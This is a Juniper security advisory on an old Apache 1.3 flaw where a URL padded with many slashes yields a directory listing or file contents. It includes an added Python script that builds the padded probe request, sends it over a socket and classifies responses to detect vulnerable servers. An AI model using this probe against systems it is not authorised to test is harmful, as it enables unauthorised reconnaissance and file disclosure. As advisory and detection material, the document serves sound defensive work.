J-Security Center

Title: Apache Artificially Long Slash Path Directory Listing Vulnerability

Severity: HIGH

Description:

Apache Webserver is a freely available, open-source software package developed and actively maintained by the Apache Software Foundation. It is a robust, highly configurable and scalable webserver that is very widely deployed.

A flaw in the default installation of the Apache webserver can allow a remote attacker to learn the layout of the server's web directory tree. The affected code lives in the mod_dir, mod_autoindex and mod_negotiation modules.

The mod_dir module handles requests for directories: it redirects a directory request that lacks a trailing slash and serves the directory's index file (index.html by default). The mod_autoindex module generates an HTML listing of a directory's contents, with an icon for each entry, when a listing is requested and no index file is served. The mod_negotiation module selects among the available variants of a resource based on what the user's browser indicates it accepts (language, media type and so on).

Because of the way these modules handle a crafted path, an attacker can bypass the error page normally returned for a non-existent directory and instead obtain a listing of an existing directory's contents. The crafted request consists of a directory path padded with an artificially large number of slashes; appending 69 slashes to the end of a URL has been reported to trigger the listing. The same technique may also disclose the contents of files readable by the HTTP server: count the characters in the target filename and replace that many of the slashes with the filename. All Apache 1.3 releases prior to 1.3.19 are affected; upgrading to 1.3.19 or later corrects the problem.
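The following is an added example written for this page, not Juniper's or the Apache project's own code. It builds the padded request path described above (including the file-disclosure variant, assuming the trailing slashes are the ones replaced, since the advisory does not say which), and classifies a raw HTTP response as an error page, ordinary content or a mod_autoindex listing. The sample responses are constructed stand-ins for a live server, and the optional fetch() helper is only for hosts you are authorised to test. The check compares a baseline request for the plain directory against the padded one: a server that lists directories in both cases simply has directory indexing enabled, which is a configuration choice and not this bug.

```python
"""Probe builder and response classifier for the Apache 1.3.x
long-slash directory listing issue (constructed example, not Juniper's
or the Apache project's code)."""
import re
import socket

# Strings that Apache 1.3 mod_autoindex places in every generated listing.
LISTING_MARKERS = (
    re.compile(rb"<title>\s*Index of ", re.IGNORECASE),
    re.compile(rb"Parent Directory", re.IGNORECASE),
)


def build_probe_path(directory, slash_count=69, filename=None):
    """Return the request path: the directory padded with slash_count
    slashes. If filename is given, the last len(filename) slashes are
    replaced by the filename (assumption: the advisory does not say which
    slashes to replace; the trailing ones are used here)."""
    base = "/" + directory.strip("/")
    if base == "/":          # the document root itself
        base = ""
    pad = "/" * slash_count
    if filename is not None:
        if not 0 < len(filename) < slash_count:
            raise ValueError("filename must be shorter than the slash padding")
        pad = pad[: slash_count - len(filename)] + filename
    return base + pad


def build_request(host, path):
    """Raw HTTP/1.0 request for the path (Apache 1.3 accepts HTTP/1.0)."""
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def parse_response(raw):
    """Split a raw HTTP response into (status code, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = int(lines[0].split(b" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return status, headers, body


def classify(raw):
    """'listing' for a mod_autoindex page, 'content' for any other 200,
    'error' for every non-200 status (the normal error page)."""
    status, _, body = parse_response(raw)
    if status != 200:
        return "error"
    if any(marker.search(body) for marker in LISTING_MARKERS):
        return "listing"
    return "content"


def is_vulnerable(baseline_raw, probe_raw):
    """The bug is present only if the plain directory request does NOT
    list the directory (index file or error page) but the padded one does.
    A server with indexing enabled lists in both cases; that is a
    configuration choice, not this vulnerability."""
    return classify(baseline_raw) != "listing" and classify(probe_raw) == "listing"


def fetch(host, port, path, timeout=5.0):
    """Send one probe over a TCP socket and return the raw response.
    Only for live testing against a host you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, path))
        chunks = []
        while True:
            chunk = sock.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks)


# Constructed sample responses standing in for a live server.
SAMPLE_INDEX_PAGE = (
    b"HTTP/1.1 200 OK\r\nServer: Apache/1.3.14 (Unix)\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<html><head><title>Welcome</title></head><body>Hello</body></html>"
)
SAMPLE_LISTING = (
    b"HTTP/1.1 200 OK\r\nServer: Apache/1.3.14 (Unix)\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<HTML><HEAD><TITLE>Index of /docs</TITLE></HEAD><BODY><H1>Index of /docs</H1>"
    b'<PRE><A HREF="/">Parent Directory</A>  <A HREF="notes.txt">notes.txt</A></PRE>'
    b"</BODY></HTML>"
)
SAMPLE_NOT_FOUND = (
    b"HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n"
    b"<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY>Not Found</BODY></HTML>"
)

if __name__ == "__main__":
    print(build_request("www.example.com", build_probe_path("/docs")).decode())
    print("baseline:", classify(SAMPLE_INDEX_PAGE), " probe:", classify(SAMPLE_LISTING))
    print("vulnerable:", is_vulnerable(SAMPLE_INDEX_PAGE, SAMPLE_LISTING))
```

For a live check, fetch the baseline with build_probe_path(directory, slash_count=1) and the probe with the default 69 slashes, then pass both raw responses to is_vulnerable(). The number of slashes that triggers the behaviour may differ between installations, so treat 69 as a starting point rather than a constant.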

Affected Products:

  • Apache Software Foundation Apache 1.3.12
  • Apache Software Foundation Apache 1.3.14
  • Apache Software Foundation Apache 1.3.17
  • Apache Software Foundation Apache 1.3.3
  • Apache Software Foundation Apache 1.3.4
  • Apache Software Foundation Apache 1.3.9
  • BSDI BSD/OS 4.0.0
  • Debian Linux 2.2.0
  • Debian Linux 2.2.0 68k
  • Debian Linux 2.2.0 alpha
  • Debian Linux 2.2.0 arm
  • Debian Linux 2.2.0 powerpc
  • Debian Linux 2.2.0 sparc
  • EnGarde Secure Linux 1.0.1
  • MandrakeSoft Corporate Server 1.0.1
  • MandrakeSoft Linux Mandrake 7.1.0
  • MandrakeSoft Linux Mandrake 7.2.0
  • MandrakeSoft Linux Mandrake 8.0.0
  • MandrakeSoft Linux Mandrake 8.0.0 ppc
  • Netscreen NetScreen-Global PRO Express Policy Manager Server
  • Netscreen NetScreen-Global PRO Policy Manager Server
  • OpenBSD OpenBSD 2.8.0
  • RedHat Linux 5.2.0 alpha
  • RedHat Linux 5.2.0 i386
  • RedHat Linux 5.2.0 sparc
  • RedHat Linux 6.2.0 alpha
  • RedHat Linux 6.2.0 i386
  • RedHat Linux 6.2.0 sparc
  • RedHat Linux 7.0.0 alpha
  • RedHat Linux 7.0.0 i386
  • S.u.S.E. Linux 7.0.0
  • S.u.S.E. Linux 7.0.0 sparc
  • S.u.S.E. Linux 7.1.0
  • SGI IRIX 6.5.0
  • SGI IRIX 6.5.1
  • SGI IRIX 6.5.10
  • SGI IRIX 6.5.11
  • SGI IRIX 6.5.2
  • SGI IRIX 6.5.3
  • SGI IRIX 6.5.4
  • SGI IRIX 6.5.5
  • SGI IRIX 6.5.6
  • SGI IRIX 6.5.7
  • SGI IRIX 6.5.8
  • SGI IRIX 6.5.9
  • Sun Cobalt ManageRaQ v2 3599BD
  • Sun Cobalt Qube3 4000WG
  • Sun Cobalt RaQ XTR 3500R
  • Sun Cobalt RaQ4 3001R
  • Sun Solaris 8
  • Sun Solaris 8_x86
  • Sun SunOS 5.8.0
  • Sun SunOS 5.8.0 _x86

Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.